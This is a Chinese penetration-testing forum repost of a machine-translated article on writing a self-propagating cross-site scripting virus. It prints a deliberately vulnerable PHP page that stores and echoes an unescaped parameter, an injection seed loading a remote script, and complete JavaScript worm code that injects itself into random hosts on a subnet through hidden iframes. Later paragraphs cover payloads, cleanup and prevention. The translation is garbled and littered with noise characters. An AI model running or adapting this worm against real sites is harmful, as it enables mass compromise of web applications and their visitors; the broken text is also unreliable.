中国网络渗透测试联盟

标题: 跨站(xss)脚本病毒编写详解 [打印本页]

作者: admin    时间: 2012-9-15 14:42
标题: 跨站(xss)脚本病毒编写详解
跨站(xss)脚本病毒编写详解 (HaCkXi译文)2009-02-23 08:55下面的概念证明表明了XSS病毒。脆弱的环境造成就是一个例子情景的XSS所需的病毒,并不表明详尽的一套可能的条件。这说明在长期的XSS一个web应用。在这种情况下,漏洞是通过利用获得的请求,这使得小病毒将创建。0 ~+ A8 P9 M) Q
3 A7 X7 [* _5 l5 {  f; B" Z
最初的一个实例脆弱的web应用将种子与自我传播的代码。当此代码是由网页浏览器,它的结果在他们的感染。被感染的网页浏览器连接到随机地点和执行利用获得的要求。注入代码,从而进一步易受感染的Web应用与自我繁殖的代码。0 a6 }" A# O3 l& _, v6 K& e

  ?# x) N( L  ]/ \& {  ?下面制作的永久性的XSS利用PHP页面可以感染病毒。该网页接受一个参数(参数)值,并写入到一个文件( file.txt ) 。这个档案,然后返回请求的浏览器。该文件将包含以前的值的“参数”参数。如果没有参数是通过它会显示该文件没有更新。/ M: }# B0 _3 K% C, U) a
  Q. ~, ]' A. x
Web应用程序:index.php
, u0 _1 |+ c/ e5 j7 e1 G2 i) D' i. M
QUOTE:<?php
8 _5 T" e1 F8 e6 J% z4 c" l   $p=$HTTP_GET_VARS['param']; " w* a5 H# E3 t, h
   $filename = "./file.txt";
& A7 B( e/ }( r: O3 j2 S4 d, `! s
$ M" J* s$ ?. E' r5 B4 W   if ($p != "") { ' y7 E* i+ j2 t! z- j4 T
$handle=fopen($filename, "wb"); 7 ]5 T( Y; }9 ]
fputs($handle, $p); : ~! @( A# U7 N$ t" [6 ^8 n) A
fclose($handle);
0 R- A9 v* R; l8 l, n( ?   }
: ]9 k. f3 Y- Y& S/ W& c0 V9 L% y( M- v4 I; Z
   $handle = fopen($filename, "r"); 5 Y% i" n: t% r9 z, E
   $contents = fread($handle, filesize($filename)); 5 z) @, d+ l: T* g8 w& t
   fclose($handle); 4 z# N& X4 b) W& Y
( A; P7 f: a/ z6 J
   print $contents;
2 {- u" n2 C3 O& c' n% `?>
+ I# ]/ c0 C! P3 K9 s* V
8 g3 ?+ b/ l& _9 h. q) @9 Q/ y此网页的index.php 主办的多个虚拟服务器在10.0.0.0/24子网。一个网络应用实例种子,然后用以下代码检索javascript文件并执行它。另外,有可能注入到整个代码的脆弱的应用,而不是要求javascript文件。为了简洁明了, JavaScript文件(xssv.jsp)要求。6 H  q* @: v; b1 ?* O* @7 Q

4 p! v  H3 H1 p8 h! @注入种子编号:5 c3 \0 x  \1 O, F' X' \

4 E5 [0 _) n# {, F/ v! G0 b' MQUOTE:<iframe name="iframex" id="iframex" src="hidden" style="display:none">
" U4 v$ U. [" T/ B4 L</iframe>
0 D0 m4 a+ g4 W<script SRC="http://<webserver>/xssv.js"></script>% L9 |7 _9 u; r

7 ?* ?- |/ K9 J0 ]0 Q) @+ O& E在javascript文件所要求的例子如下所示。其自我用途繁殖的iframe是定期重新使用loadIframe ()函数。目标网站的IP地址的iframe是随机挑选的10.0.0.0/24子网的功能通过get_random_ip()。该病毒使用的XSS相结合的这两项职能,并不断定期调用使用setInterval()函数。
% Y$ x1 ^* D* Q5 p% e/ t7 }8 y
; _) X# [) G, W* X8 L; y2 J! b$ @Javascipt : xssv.jsp
' M% a, a4 t/ }3 M# |6 c/ R7 X& ]/ E  f! S$ R9 s5 _+ S) z
QUOTE:function loadIframe(iframeName, url) { 5 {4 t! x) _3 L" K3 e) x
   if ( window.frames[iframeName] ) { $ X0 C5 z! V+ b7 u3 b- D2 o( P
window.frames[iframeName].location = url; & M' Q$ f3 R) L) W
return false;   g7 |. l9 ~( |" J# \0 \
   }
( ^& B1 G2 y4 G0 b( l   else return true;
8 d6 k+ I5 |/ ^2 ]; V; p$ z} 1 B. W! h% u, E; L1 {1 J& X
4 N# K& H' L8 s. U$ e
function do_request() { 9 O. r; i; T9 C) ^4 O3 p! ?# R
   var ip = get_random_ip();   M9 R" T0 I" O( P$ e
   var exploit_string = '<iframe name="iframe2" id="iframe2" ' + 9 \+ d0 `4 B! Z
'src="hidden" style="display:none"></iframe> ' +
( J1 t( h, u9 P+ q( c6 y  a3 Z$ L'<script SRC="http://<webserver>/xssv.js"></script>';
% A+ m2 a$ {! D1 E; l# u0 `, [% _& \4 ~+ z; H4 Z! }9 O6 m
   loadIframe('iframe2',
! e; x" t4 H4 f, L" \) D# I"http://" + ip + "/index.php?param=" + exploit_string); # W, ?* v9 v3 A! Y
} 5 A5 i! C$ ~6 {# X  L, L
; p7 i& A& ~; p) x% t
function get_random() ; }2 ^- z3 p9 O( K/ l4 T
{
8 \, z& x; U# H0 T0 A   var ranNum= Math.round(Math.random()*255);
# n8 e. |3 r5 ^$ K2 S   return ranNum; % ?, H0 A; X( C2 s+ _' n4 Y( _
}
9 [; H1 f: p, a- V
2 z& W0 m! [7 G* b$ ^, @' A5 Qfunction get_random_ip() $ W1 o0 o" B' h
{ . l. U& d" M+ W
   return "10.0.0."+get_random();
- u, y; I* V) ]}
9 a, Q0 \" \7 J, Y0 I& u" j8 E$ ^9 j
setInterval("do_request()", 10000);9 N5 Q$ o. g; [0 s0 f, J

# V2 w! v2 U& F% L看种子Web应用的浏览器造成感染其他网络应用的10.0.0.0/24子网。这种感染,一直持续到一些,但并非所有的应用受到感染。在这一点上的浏览器是手动停止。另一个浏览器,然后用来查看一个新感染的Web应用。该病毒然后继续感染,其余未web应用程序的子网内。6 y. m9 L, Y. a4 i2 X+ O$ b9 R

: I4 w7 j4 u5 c7 K% _这个概念证明表明,控制的条件下,没有什么不同,以一个真实的世界环境中,跨站脚本病毒可以自我繁殖和传染。
! ~1 M; C& R  e2 u" S+ C1 N# S* d# y  m; `4 k
常规病毒分歧  G% b* n' ^, N% F

: y, o8 f9 a0 v0 ]常规病毒和执行居住在同一系统上。单独的XSS病毒的这两个要求的一种共生关系,服务器和浏览器。执行发生在客户端浏览器的代码,并驻留在服务器上。1 W# ~: O* E3 y! I  G7 w
! k4 d3 X" Q* L' X9 a
纲要indiscrimination还分成一的XSS病毒从传统的对应。这是因为封装在HTML和HTTP / HTTPS协议。这些标准是支持大部分网络浏览器上运行不同的操作系统,使得跨站点脚本病毒平台独立。这个平台的独立性增加了一些潜在的网络应用,可感染。
9 @9 O+ g  A. w- `) i2 }, X0 Q感染
% l# z  t7 y3 j3 W0 k: p
' r+ N" m1 F2 u5 _& Y* G4 n5 d) E跨站点脚本病毒感染发生在两个阶段,通常至少有两个设备。因此,有两种感染工作共生。  B+ R8 v% }& o, ^- i

$ H+ [3 ~, h, D4 n服务器感染了持续自我传播的代码,它没有执行。第二阶段是浏览器的感染。注入代码加载从网站到非持久性的网络浏览器和处决。执行然后寻求新的服务器/网页加以利用并有可能执行它的有效载荷。通常情况下,将有一个受感染的服务器,许多受感染的浏览器。 & c8 ?- O+ T' Z" o" i
有效载荷0 N% @: S) _( W) ?" h$ U4 l
! n( R& r- S2 `
常规病毒一样,病毒的XSS能够提供有效载荷。该有效载荷将被处死的浏览器,并有限制的HTML兼容的代码。也就是说,有效载荷可以执行的HTML功能,包括了JavaScript 。
' X2 D& w( b0 d5 N
) U. g: K3 n- x4 v  l1 u( C3 n虽然这并不构成限制,跨站脚本病毒仍然能够恶意活动。例如,可以有效载荷提供DDOS攻击,显示垃圾邮件或包含浏览器的漏洞。未来的载荷能力很可能是更大的原因越来越多的浏览器老练。
( W. X9 E$ z, X/ |1 q- u% O6 w消毒
* R0 c% t7 V6 ?2 c" u3 d& {5 E5 X7 x. ~8 E# @' a% K
之间的关系,服务器和一个浏览器可以被打破,只需关闭浏览器。但是,目前还没有手段来防止浏览器再次感染以外的其他禁用浏览器的功能。+ p6 _) S6 U4 m* T7 y5 b: ~
% I( d7 l4 \5 ?7 N) h* I& i
潜在的消毒方法将涉及引荐外地的请求标头。这是由于这一事实,即引荐很可能是登录网络服务器那里感染了尝试。因此,如果引荐欺骗并没有发生后,日志文件将揭示线索回到来源的病毒。+ f4 T! o3 O( W( E2 B1 W: x' B
* `) {3 L* n) h  ?
预防
. ~9 z  C; ^+ z3 k8 |" T: n, `( D2 w" z. M
一个共同的初期,以预防病毒感染是一个网络级防火墙。正如的HTTP / HTTPS协议是提供不受限制地通过共同的防火墙配置,这些防火墙障碍是无效的。一个潜在的补救措施,这是一个应用防火墙适当的XSS病毒签名。虽然不太可能,最明显的方式,以防止病毒的XSS是消除了XSS漏洞的Web应用。( `# k5 a. V% s- U
- j( U  b) \- z- G
结论& A+ y; E5 @" A/ g1 Y% [
6 f* @: p+ I0 S8 l2 S
传染病性质的XSS病毒已被证明在一个受控环境。它是通过故意制作脆弱的网络应用程序分布在子网。这个环境,后来受到感染。% J' B: Z5 C8 B# h8 |% y7 R
. \  g, v. E% H* l5 C, J5 G! ~) \
的XSS病毒是一种新的物种。他们区分自己从他们的表兄弟通过常规的要求一台服务器的客户共生的关系和它们的平台独立性。这些差异产生积极和消极影响,毒的感染。
3 U) c! M) t& L; N2 t* r: P1 w- c& z5 A
本文说明了XSS病毒是平台独立的,并能进行恶意的职能。虽然有减缓的因素,这些问题再加上日益复杂的网络浏览器显示的XSS威胁的病毒。主动必须采取措施,以打击这一威胁,病毒之前的XSS成为流行病。! p  u$ I# r6 g4 G7 w0 o
  w+ N9 n+ o1 w6 @. X
                                                                 翻译者: HaCkXi
/ q- [/ S5 }$ Y- V4 V. h% o                                                           Blog: www.hackxi.cn4 C0 }# W1 D" Q/ x0 J8 F0 ?1 r
                                                                 提供者:ShadowHider
+ n6 \5 v( V2 A) `                                                           Blog: http://hi.baidu.com/zrxc
7 }5 @- _2 s: W% a" c8 U
( V2 K, K7 D2 z% }




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2